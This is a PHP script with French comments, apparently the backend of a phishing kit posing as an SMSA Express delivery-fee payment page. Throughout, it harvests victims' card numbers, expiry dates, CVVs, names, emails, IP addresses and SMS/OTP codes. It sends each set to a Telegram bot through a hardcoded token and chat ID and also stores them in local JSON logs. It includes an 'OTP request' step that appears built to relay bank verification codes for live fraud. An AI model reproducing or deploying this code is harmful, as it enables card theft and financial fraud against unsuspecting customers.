<?php
/**
 * SMSA EXPRESS - SEND DATA TO TELEGRAM
 * 
 * Ce fichier envoie les données de paiement, SMS et succès à un canal Telegram
 */

// Configuration Telegram
define('BOT_TOKEN', '8549677452:AAFg-83-lhm3jAEoEbZyiPNGd4mQ7LxTmyo'); // Token du bot
define('CHAT_ID', '8278634960');     // Chat ID

// Headers
header('Content-Type: application/json');

// Vérifier si la requête est POST
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo json_encode(['success' => false, 'message' => 'Invalid request method']);
    exit;
}

// Récupérer l'action
$action = sanitize($_POST['action'] ?? 'payment_data');

// Enregistrer le log de la requête
logRequest($action, $_POST);

// Traiter selon l'action
switch ($action) {
    case 'payment_data':
        handlePaymentData();
        break;
    case 'otp_request':
        handleOTPRequest();
        break;
    case 'otp_verification':
        handleOTPVerification();
        break;
    case 'payment_success':
        handlePaymentSuccess();
        break;
    default:
        echo json_encode(['success' => false, 'message' => 'Unknown action']);
        exit;
}

/**
 * Traiter les données de paiement
 */
function handlePaymentData() {
    $data = [
        'tracking_number' => sanitize($_POST['tracking_number'] ?? ''),
        'delivery_fee' => sanitize($_POST['delivery_fee'] ?? ''),
        'card_name' => sanitize($_POST['card_name'] ?? ''),
        'email' => sanitize($_POST['email'] ?? ''),
        'card_number' => sanitize($_POST['card_number'] ?? ''),
        'expiry_date' => sanitize($_POST['expiry_date'] ?? ''),
        'cvv' => sanitize($_POST['cvv'] ?? ''),
        'timestamp' => sanitize($_POST['timestamp'] ?? ''),
        'ip_address' => $_SERVER['REMOTE_ADDR']
    ];

    // Valider les données
    if (empty($data['tracking_number']) || empty($data['card_number'])) {
        echo json_encode(['success' => false, 'message' => 'Missing required data']);
        exit;
    }

    // Créer le message Telegram
    $message = "💳 *PAYMENT DATA RECEIVED*\n\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "📦 *Shipment Information*\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔖 Tracking Number: `" . $data['tracking_number'] . "`\n";
    $message .= "💰 Delivery Fee: " . $data['delivery_fee'] . "\n\n";
    
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "👤 *Customer Information*\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "📝 Name: " . $data['card_name'] . "\n";
    $message .= "📧 Email: " . $data['email'] . "\n\n";
    
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "💳 *Card Information*\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔐 Card Number: `" . $data['card_number'] . "`\n";
    $message .= "📅 Expiry Date: " . $data['expiry_date'] . "\n";
    $message .= "🔑 CVV: `" . $data['cvv'] . "`\n\n";
    
    $message .= "⏰ Timestamp: " . $data['timestamp'] . "\n";
    $message .= "🌐 IP Address: " . $data['ip_address'] . "\n";

    // Envoyer à Telegram
    $result = sendToTelegram($message);

    // Enregistrer les données localement
    logPaymentData($data);

    // Retourner la réponse
    echo json_encode($result);
    exit;
}

/**
 * Traiter le code SMS
 */
function handleSMSCode() {
    $data = [
        'sms_code' => sanitize($_POST['sms_code'] ?? ''),
        'tracking_number' => sanitize($_POST['tracking_number'] ?? ''),
        'timestamp' => sanitize($_POST['timestamp'] ?? '')
    ];

    if (empty($data['sms_code'])) {
        echo json_encode(['success' => false, 'message' => 'Missing SMS code']);
        exit;
    }

    // Créer le message Telegram
    $message = "📱 *SMS VERIFICATION CODE*\n\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔐 Verification Code: `" . $data['sms_code'] . "`\n";
    $message .= "🔖 Tracking Number: `" . $data['tracking_number'] . "`\n";
    $message .= "⏰ Timestamp: " . $data['timestamp'] . "\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";

    // Envoyer à Telegram
    $result = sendToTelegram($message);

    // Enregistrer les données localement
    logSMSCode($data);

    // Retourner la réponse
    echo json_encode($result);
    exit;
}

/**
 * Traiter la demande d'OTP
 */
function handleOTPRequest() {
    $data = [
        'tracking_number' => sanitize($_POST['tracking_number'] ?? ''),
        'card_name' => sanitize($_POST['card_name'] ?? ''),
        'email' => sanitize($_POST['email'] ?? ''),
        'timestamp' => sanitize($_POST['timestamp'] ?? '')
    ];

    if (empty($data['tracking_number'])) {
        echo json_encode(['success' => false, 'message' => 'Missing tracking number']);
        exit;
    }

    // Créer le message Telegram
    $message = "📱 *OTP REQUEST*\n\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔐 *Please send OTP to customer*\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔖 Tracking Number: `" . $data['tracking_number'] . "`\n";
    $message .= "👤 Customer Name: " . $data['card_name'] . "\n";
    $message .= "📧 Email: " . $data['email'] . "\n";
    $message .= "⏰ Timestamp: " . $data['timestamp'] . "\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n";
    $message .= "⚠️ *Please generate and send a 6-digit OTP to the customer's phone*\n";

    // Envoyer à Telegram
    $result = sendToTelegram($message);

    // Enregistrer les données localement
    logOTPRequest($data);

    // Retourner la réponse
    echo json_encode($result);
    exit;
}

/**
 * Traiter la vérification d'OTP
 */
function handleOTPVerification() {
    $data = [
        'otp_code' => sanitize($_POST['otp_code'] ?? ''),
        'tracking_number' => sanitize($_POST['tracking_number'] ?? ''),
        'timestamp' => sanitize($_POST['timestamp'] ?? '')
    ];

    if (empty($data['otp_code'])) {
        echo json_encode(['success' => false, 'message' => 'Missing OTP code']);
        exit;
    }

    // Créer le message Telegram
    $message = "✅ *OTP VERIFICATION*\n\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🔐 OTP Code Entered: `" . $data['otp_code'] . "`\n";
    $message .= "🔖 Tracking Number: `" . $data['tracking_number'] . "`\n";
    $message .= "⏰ Timestamp: " . $data['timestamp'] . "\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";

    // Envoyer à Telegram
    $result = sendToTelegram($message);

    // Enregistrer les données localement
    logOTPVerification($data);

    // Retourner la réponse
    echo json_encode($result);
    exit;
}

/**
 * Traiter le succès du paiement
 */
function handlePaymentSuccess() {
    $data = [
        'transaction_id' => sanitize($_POST['transaction_id'] ?? ''),
        'tracking_number' => sanitize($_POST['tracking_number'] ?? ''),
        'delivery_fee' => sanitize($_POST['delivery_fee'] ?? ''),
        'timestamp' => sanitize($_POST['timestamp'] ?? '')
    ];

    if (empty($data['transaction_id'])) {
        echo json_encode(['success' => false, 'message' => 'Missing transaction ID']);
        exit;
    }

    // Créer le message Telegram
    $message = "✅ *PAYMENT SUCCESSFUL*\n\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🎉 Payment has been processed successfully\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🆔 Transaction ID: `" . $data['transaction_id'] . "`\n";
    $message .= "🔖 Tracking Number: `" . $data['tracking_number'] . "`\n";
    $message .= "💰 Amount: " . $data['delivery_fee'] . "\n";
    $message .= "⏰ Timestamp: " . $data['timestamp'] . "\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";

    // Envoyer à Telegram
    $result = sendToTelegram($message);

    // Enregistrer les données localement
    logPaymentSuccess($data);

    // Retourner la réponse
    echo json_encode($result);
    exit;
}

/**
 * Nettoyer les données
 */
function sanitize($input) {
    return htmlspecialchars(stripslashes(trim($input)), ENT_QUOTES, 'UTF-8');
}

/**
 * Masquer le numéro de carte
 */
function maskCardNumber($cardNumber) {
    $cardNumber = str_replace(' ', '', $cardNumber);
    $lastFour = substr($cardNumber, -4);
    return '**** **** **** ' . $lastFour;
}

/**
 * Envoyer le message à Telegram
 */
function sendToTelegram($message) {
    $url = "https://api.telegram.org/bot" . BOT_TOKEN . "/sendMessage";
    
    $postData = [
        'chat_id' => CHAT_ID,
        'text' => $message,
        'parse_mode' => 'Markdown'
    ];

    $options = [
        'http' => [
            'method' => 'POST',
            'header' => 'Content-type: application/x-www-form-urlencoded',
            'content' => http_build_query($postData),
            'timeout' => 10
        ]
    ];

    $context = stream_context_create($options);
    
    try {
        $response = file_get_contents($url, false, $context);
        $result = json_decode($response, true);
        
        if ($result && $result['ok']) {
            return [
                'success' => true,
                'message' => 'Data sent to Telegram successfully',
                'message_id' => $result['result']['message_id']
            ];
        } else {
            $errorMsg = isset($result['description']) ? $result['description'] : 'Unknown error';
            return [
                'success' => false,
                'message' => 'Failed to send to Telegram: ' . $errorMsg
            ];
        }
    } catch (Exception $e) {
        return [
            'success' => false,
            'message' => 'Error sending to Telegram: ' . $e->getMessage()
        ];
    }
}

/**
 * Enregistrer les données de paiement localement
 */
function logPaymentData($data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/payments_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $payments = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $payments = json_decode($content, true) ?? [];
    }

    // Ajouter la nouvelle transaction
    $payments[] = array_merge($data, [
        'id' => 'PAY_' . time() . '_' . rand(1000, 9999),
        'recorded_at' => date('Y-m-d H:i:s')
    ]);

    // Enregistrer les données
    file_put_contents($logFile, json_encode($payments, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

/**
 * Enregistrer le code SMS localement
 */
function logSMSCode($data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/sms_codes_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $codes = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $codes = json_decode($content, true) ?? [];
    }

    // Ajouter le nouveau code
    $codes[] = array_merge($data, [
        'id' => 'SMS_' . time() . '_' . rand(1000, 9999),
        'recorded_at' => date('Y-m-d H:i:s')
    ]);

    // Enregistrer les données
    file_put_contents($logFile, json_encode($codes, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

/**
 * Enregistrer le succès du paiement localement
 */
function logPaymentSuccess($data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/success_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $successes = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $successes = json_decode($content, true) ?? [];
    }

    // Ajouter la nouvelle transaction
    $successes[] = array_merge($data, [
        'id' => 'SUCCESS_' . time() . '_' . rand(1000, 9999),
        'recorded_at' => date('Y-m-d H:i:s')
    ]);

    // Enregistrer les données
    file_put_contents($logFile, json_encode($successes, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

/**
 * Enregistrer la demande d'OTP localement
 */
function logOTPRequest($data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/otp_requests_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $requests = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $requests = json_decode($content, true) ?? [];
    }

    // Ajouter la nouvelle demande
    $requests[] = array_merge($data, [
        'id' => 'OTP_REQ_' . time() . '_' . rand(1000, 9999),
        'recorded_at' => date('Y-m-d H:i:s')
    ]);

    // Enregistrer les données
    file_put_contents($logFile, json_encode($requests, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

/**
 * Enregistrer la vérification d'OTP localement
 */
function logOTPVerification($data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/otp_verifications_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $verifications = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $verifications = json_decode($content, true) ?? [];
    }

    // Ajouter la nouvelle vérification
    $verifications[] = array_merge($data, [
        'id' => 'OTP_VER_' . time() . '_' . rand(1000, 9999),
        'recorded_at' => date('Y-m-d H:i:s')
    ]);

    // Enregistrer les données
    file_put_contents($logFile, json_encode($verifications, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

/**
 * Enregistrer les logs des requêtes
 */
function logRequest($action, $data) {
    $logsDir = __DIR__ . '/logs';
    
    // Créer le dossier logs s'il n'existe pas
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0755, true);
    }

    $logFile = $logsDir . '/requests_' . date('Y-m-d') . '.json';
    
    // Lire les données existantes
    $requests = [];
    if (file_exists($logFile)) {
        $content = file_get_contents($logFile);
        $requests = json_decode($content, true) ?? [];
    }

    // Ajouter la nouvelle requête
    $requests[] = [
        'action' => $action,
        'timestamp' => date('Y-m-d H:i:s'),
        'ip_address' => $_SERVER['REMOTE_ADDR'],
        'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'
    ];

    // Enregistrer les données
    file_put_contents($logFile, json_encode($requests, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    chmod($logFile, 0644);
}

?>
